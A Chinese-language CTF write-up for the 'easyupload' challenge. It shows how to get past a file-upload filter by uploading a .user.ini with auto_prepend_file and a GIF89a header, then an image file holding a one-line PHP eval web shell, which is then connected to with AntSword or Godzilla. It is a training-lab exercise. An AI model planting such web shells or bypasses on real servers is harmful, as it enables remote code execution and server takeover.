【web | CTF】攻防世界 easyupload

天命:好像也不太easy

本条题目有好几个防御点:

  1. 后缀名防御:只能上传图片格式
  2. 内容防御:内容不能有php
  3. 图片头防御:检测文件的头部信息,是否是图片头

首先判断只能上传图片格式的话,

那只能通过其他漏洞来把图片解析成php才能构成漏洞了

看了一下别人wp,原来是利用php的配置文件来实现漏洞攻击

php的 user.ini 配置文件里,有一个参数是在文件运行前把某个文件包含进来的

auto_prepend_file=文件名

我们只需要做一个局部配置文件,即可触发效果

然后上传图片,把图片包含进来即可

就相当于触发了文件包含漏洞

步骤一:准备文件

准备 .user.ini 文件,这里的GIF89a是用来绕过防御三(看上面)

GIF89a    
auto_prepend_file=a.jpg

准备 a.jpg 文件,这里取消用 <?php ?>

采用了短标签写法,php7.0之后弃用,7.4好像就取消了,所以这题应该是php5

GIF89a   
<?=@eval($_POST['pass']);?>

步骤二:上传文件

先上传 .user.ini ,记得改成图片类型

再上传 a.jpg ,正常上传就行

然后查看一下流量去哪里了

说实话这里我也没看懂,只知道 .user.ini文件会应该 php 文件来包含 a.jpg

所以我们的木马应该是在这个 index.php 文件里连接

中国蚁剑getshell完事

flag在最外面的地方

真机测试:成功

用phpstudy和使用upload-labs靶场的第一关,步骤同上,上传完两个文件后

用哥斯拉连接,成功

这里有一个小细节,你需要upload目录下的一个php文件才可以,不然没东西包含进去

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星盾网安

能花钱买到的知识,都不贵

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值